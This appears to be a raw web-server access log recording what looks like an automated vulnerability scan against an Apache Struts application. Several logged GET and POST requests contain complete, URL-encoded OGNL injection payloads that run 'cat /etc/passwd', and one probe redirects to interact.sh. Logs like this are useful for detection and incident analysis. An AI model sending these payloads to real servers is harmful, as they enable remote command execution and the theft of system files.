0:0:0:0:0:0:0:1 - - [25/Feb/2024:07:38:58 -0500] "GET /simple.php HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:07:39:02 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [25/Feb/2024:07:39:07 -0500] "GET /style.php HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:07:39:12 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [25/Feb/2024:07:39:20 -0500] "GET /chosen.php HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:07:39:25 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [25/Feb/2024:07:39:29 -0500] "GET /simple.php HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:07:39:32 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:07:51 -0500] "GET /portal/displayAPSForm.action?debug=command&expression=3599*6393 HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:07:52 -0500] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:07:52 -0500] "GET /?id=nrXFPA%25{128*128} HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:12:05 -0500] "GET /$%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,%23a=@java.lang.Runtime@getRuntime().exec('cat%20/etc/passwd').getInputStream(),%23b=new%20java.io.InputStreamReader(%23a),%23c=new%20%20java.io.BufferedReader(%23b),%23d=new%20char%5B51020%5D,%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())%7D/actionChain1.action HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:15:44 -0500] "GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:15:44 -0500] "GET /index.action?redirect:http://www.interact.sh/ HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:15:44 -0500] "POST /user.action HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:15:44 -0500] "POST /login.action HTTP/1.1" 200 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:16:33 -0500] "POST /integration/saveGangster.action HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:17:44 -0500] "POST / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:17:45 -0500] "POST / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:18:49 -0500] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:20:09 -0500] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:20:09 -0500] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:20:10 -0500] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:45:25 -0500] "GET /robots.txt HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:45:33 -0500] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:18:45:58 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [25/Feb/2024:19:43:53 -0500] "HEAD / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:19:43:53 -0500] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:19:47:09 -0500] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:19:47:10 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [25/Feb/2024:19:47:10 -0500] "GET /robots.txt HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:19:47:11 -0500] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:19:47:11 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [25/Feb/2024:20:02:36 -0500] "GET /lui/ HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:20:02:36 -0500] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:20:02:37 -0500] "GET /hub/ HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:20:02:37 -0500] "GET /struts2-showcase/showcase.action HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:20:23:34 -0500] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [25/Feb/2024:20:23:35 -0500] "POST /orders/3 HTTP/1.1" 302 -